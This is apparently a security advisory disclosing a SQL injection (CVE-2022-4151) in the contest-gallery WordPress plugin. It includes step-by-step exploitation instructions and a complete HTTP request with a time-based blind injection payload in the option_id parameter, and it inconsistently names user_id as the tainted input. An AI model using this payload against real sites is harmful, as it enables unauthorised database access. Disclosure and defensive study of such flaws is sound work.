contest-gallery (2/15) WordPress plug-in SQL injection

Vulnerability Metadata

Key Value
Date of Disclosure December 05 2022
Affected Software contest-gallery
Affected Software Type WordPress plugin
Weakness SQL Injection
CVE ID CVE-2022-4151
CVSS 3.x Base Score n/a
CVSS 2.0 Base Score n/a
Reporter Kunal Sharma, Daniel Krohmer
Reporter Contact
Link to Affected Software
Link to Vulnerability DB

Vulnerability Description

The option_id GET query parameter in contest-gallery is vulnerable to SQL Injection. An authenticated attacker may abuse the Export all fields and total rating functionality in cg_images_data_csv_export function inside export-images-data.php. This leads to a threat actor crafting a malicious GET request.

Exploitation Guide

Login as admin user. This attack requires at least admin privileges.

Create a New Gallery, if no gallery was created before.


Change the Gallery name.



Click on Edit gallery.


Click Export all fields and total rating


Clicking Export all fields and total rating triggers the vulnerable request, the option_id GET parameter is the vulnerable query parameter.


A POC may look like the following request:


In the application code, the vulnerability is triggered by un-sanitized user input of user_id at line 21 in ./v10/v10-admin/export/export-images-data.php.


At lines 38-43 in ./v10/v10-admin/export/export-images-data.php the database query call on $GalleryID leads to SQL Injection.


Exploit Payload

Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.

The SQL injection can be triggered by sending the request below:

POST /wp-admin/admin.php?page=contest-gallery/index.php&option_id=8+AND+(SELECT+7394+FROM+(SELECT(SLEEP(3*2)))UrUZ)&edit_gallery=true HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8080/wp-admin/admin.php?page=contest-gallery%2Findex.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
Origin: http://localhost:8080
Connection: close
Cookie: wordpress_37d007a56d816107ce5b52c10342db37=kaiba%7C1668473199%7CmFhoaVtvxA8yev5wAqpggBLhRsiY0PfpEBma5kPRq8T%7Cb131f9f1d3b9498930de4f620580d0214b838d43b71fdedf92328ca0032bbcdb; wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=kaiba%7C1668473199%7CmFhoaVtvxA8yev5wAqpggBLhRsiY0PfpEBma5kPRq8T%7Cf386bbd185ec8df8d8f91a0b8e8c5431b81e06b292212515a24d8c73b7d47d52; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse; wp-settings-time-1=1668300399
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1